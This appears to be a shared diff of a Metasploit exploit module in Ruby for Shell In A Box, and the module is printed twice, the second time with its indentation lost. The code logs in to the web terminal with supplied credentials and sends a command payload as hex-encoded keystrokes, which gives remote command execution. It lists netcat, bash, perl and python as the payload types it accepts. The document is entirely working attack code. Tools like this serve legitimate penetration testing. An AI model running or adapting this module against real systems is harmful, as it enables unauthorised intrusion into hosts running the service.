bcoles · August 25, 2014 11:05
diff --git a/shellinabox.rb b/shellinabox.rb
 ##
 # This module requires Metasploit: http//metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

 require 'msf/core'

 class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'Shell In A Box Authenticated Command Execution',
      'Description'     => %q{
          This module uses valid credentials to log in to Shell In A Box and
        execute arbitrary operating system commands. Shell In A Box must be
        configured to use the system shell (default).
      },
      'License'         => MSF_LICENSE,
      'Privileged'      => false,
      'Platform'        => %w{ unix linux },
      'Arch'            => ARCH_CMD,
      'Author'          =>
        [
          'Brendan Coles <bcoles[at]gmail.com>', # Metasploit
        ],
      'References'      =>
        [
          ['URL', 'http://code.google.com/p/shellinabox/']
        ],
      'Payload'         =>
        {
          'Space'       => 1024,
          'BadChars'    => "\x00",
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic netcat python perl bash telnet'
            }
        },
      'Targets'         =>
        [
          # Tested on Shell In A Box version 2.14
          ['Automatic Targeting', { 'auto' => true }]
        ],
      'DefaultTarget'   => 0,
      'DisclosureDate'  => 'Aug 12 2012' # Shell In A Box release date
    ))
    register_options(
      [
        Opt::RPORT(4200),
        OptString.new('USERNAME',  [true,  'The username for Shell In A Box']),
        OptString.new('PASSWORD',  [false, 'The password for Shell In A Box'])
      ], self.class)
  end

  #
  # Check
  #
  def check
    if get_session_id
      return Exploit::CheckCode::Detected
    else
      vprint_error "#{peer} - Could not get session ID"
    end
    Exploit::CheckCode::Safe
  end

  #
  # Send commands to server as ASCII hex
  #
  def execute_command(cmd, opts = {})
    req = ''
    if !cmd.nil?
      cmd.bytes.each do |b|
        req << '%.2X' % b
      end
    end
    req << '0D'
    vprint_debug "#{peer} - Sending request (#{req.length} bytes): #{cmd}"
    res = send_request_cgi(
      'method'    => 'POST',
      'vars_post' => Hash[{
        'width'   => rand(200),
        'height'  => rand(200),
        'session' => @session_id,
        'keys'    => req
      }.to_a.shuffle]
    )
    if !res
      print_error "#{peer} - Connection failed"
    elsif res.code == 200 && res.body =~ /<title>OK<\/title>/
      vprint_status "#{peer} - Request sent successfully"
    else
      print_error "#{peer} - Sending request failed"
    end
    res = get_response
    vprint_status "#{peer} - Received response (#{res.body.length} bytes) [HTTP #{res.code}]"
    vprint_debug "#{peer} - Replied: #{res.body}"
    res
  end

  #
  # Retrieve session ID
  #
  def get_session_id
    vprint_status "#{peer} - Fetching session ID..."
    res = get_response
    if !res
      vprint_error "#{peer} - Connection failed"
    elsif res.code == 200 && res.body =~ /"session":"(.+?)"/
      session_id = res.body.match(/"session":"(.+?)"/)[1]
      vprint_status "#{peer} - Found session ID: #{session_id}"
    else
      vprint_error "#{peer} - Could not get session ID"
    end
    session_id
  end

  #
  # Retrieve server response
  #
  def get_response
    send_request_cgi(
      'method'    => 'POST',
      'vars_post' => Hash[{
        'width'   => rand(200),
        'height'  => rand(200),
        'session' => @session_id
      }.to_a.shuffle]
    )
  end

  #
  # Exploit
  #
  def exploit
    # get session id
    @session_id = get_session_id
    if @session_id.nil?
      fail_with Exploit::Failure::Unknown, "#{peer} - Could not get session ID."
    end
    # login
    execute_command datastore['USERNAME']
    execute_command datastore['PASSWORD']
    # send payload
    execute_command payload.encoded
  end
 end
	##
	# This module requires Metasploit: http//metasploit.com/download
	# Current source: https://github.com/rapid7/metasploit-framework
	##

	require 'msf/core'

	class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
	super(update_info(
	info,
	'Name' => 'Shell In A Box Authenticated Command Execution',
	'Description' => %q{
	This module uses valid credentials to log in to Shell In A Box and
	execute arbitrary operating system commands. Shell In A Box must be
	configured to use the system shell (default).
	},
	'License' => MSF_LICENSE,
	'Privileged' => false,
	'Platform' => %w{ unix linux },
	'Arch' => ARCH_CMD,
	'Author' =>
	[
	'Brendan Coles <bcoles[at]gmail.com>', # Metasploit
	],
	'References' =>
	[
	['URL', 'http://code.google.com/p/shellinabox/']
	],
	'Payload' =>
	{
	'Space' => 1024,
	'BadChars' => "\x00",
	'DisableNops' => true,
	'Compat' =>
	{
	'PayloadType' => 'cmd',
	'RequiredCmd' => 'generic netcat python perl bash telnet'
	}
	},
	'Targets' =>
	[
	# Tested on Shell In A Box version 2.14
	['Automatic Targeting', { 'auto' => true }]
	],
	'DefaultTarget' => 0,
	'DisclosureDate' => 'Aug 12 2012' # Shell In A Box release date
	))
	register_options(
	[
	Opt::RPORT(4200),
	OptString.new('USERNAME', [true, 'The username for Shell In A Box']),
	OptString.new('PASSWORD', [false, 'The password for Shell In A Box'])
	], self.class)
	end

	#
	# Check
	#
	def check
	if get_session_id
	return Exploit::CheckCode::Detected
	else
	vprint_error "#{peer} - Could not get session ID"
	end
	Exploit::CheckCode::Safe
	end

	#
	# Send commands to server as ASCII hex
	#
	def execute_command(cmd, opts = {})
	req = ''
	if !cmd.nil?
	cmd.bytes.each do \|b\|
	req << '%.2X' % b
	end
	end
	req << '0D'
	vprint_debug "#{peer} - Sending request (#{req.length} bytes): #{cmd}"
	res = send_request_cgi(
	'method' => 'POST',
	'vars_post' => Hash[{
	'width' => rand(200),
	'height' => rand(200),
	'session' => @session_id,
	'keys' => req
	}.to_a.shuffle]
	)
	if !res
	print_error "#{peer} - Connection failed"
	elsif res.code == 200 && res.body =~ /<title>OK<\/title>/
	vprint_status "#{peer} - Request sent successfully"
	else
	print_error "#{peer} - Sending request failed"
	end
	res = get_response
	vprint_status "#{peer} - Received response (#{res.body.length} bytes) [HTTP #{res.code}]"
	vprint_debug "#{peer} - Replied: #{res.body}"
	res
	end

	#
	# Retrieve session ID
	#
	def get_session_id
	vprint_status "#{peer} - Fetching session ID..."
	res = get_response
	if !res
	vprint_error "#{peer} - Connection failed"
	elsif res.code == 200 && res.body =~ /"session":"(.+?)"/
	session_id = res.body.match(/"session":"(.+?)"/)[1]
	vprint_status "#{peer} - Found session ID: #{session_id}"
	else
	vprint_error "#{peer} - Could not get session ID"
	end
	session_id
	end

	#
	# Retrieve server response
	#
	def get_response
	send_request_cgi(
	'method' => 'POST',
	'vars_post' => Hash[{
	'width' => rand(200),
	'height' => rand(200),
	'session' => @session_id
	}.to_a.shuffle]
	)
	end

	#
	# Exploit
	#
	def exploit
	# get session id
	@session_id = get_session_id
	if @session_id.nil?
	fail_with Exploit::Failure::Unknown, "#{peer} - Could not get session ID."
	end
	# login
	execute_command datastore['USERNAME']
	execute_command datastore['PASSWORD']
	# send payload
	execute_command payload.encoded
	end
	end